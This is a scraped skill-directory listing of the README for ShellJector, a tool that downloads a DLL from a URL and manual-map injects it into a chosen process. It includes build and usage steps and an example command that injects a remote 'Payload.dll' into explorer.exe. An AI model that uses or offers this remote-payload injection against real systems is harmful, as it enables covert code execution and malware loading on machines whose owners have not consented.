SkillAgentSearch skills...

ShellJector

Manual map shellcode (aka byte array) injector

Install / Use

/learn @Wolf49406/ShellJector
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

ShellJector (v2.0)

Manual map shellcode (aka byte array) injector wich can download DLL from the internet by URL
Also take a look at local version!

MSBuild

How to Build:

  • Open ShellJector.sln -> main.cpp;
  • Set ProcName and DllURL;
  • Build;

Usage:

  • Go to \ShellJector\Build;
    • OR just download the Latest Release;
    • Set launch arguments (down below);
  • Open Target Process;
  • Open ShellJector.exe;

Arguments:

You can set ProcName and DllURL with -proc and -url arguments
(ex: ShellJector.exe -proc explorer.exe -url "https://example.com/Payload.dll")
Arguments are case sensitive!

Stargazers over time

Stargazers over time

Related Skills

View on GitHub
GitHub Stars83
CategoryDevelopment
Updated25d ago
Forks21

Languages

C++

Security Score

100/100

Audited on Mar 2, 2026

No findings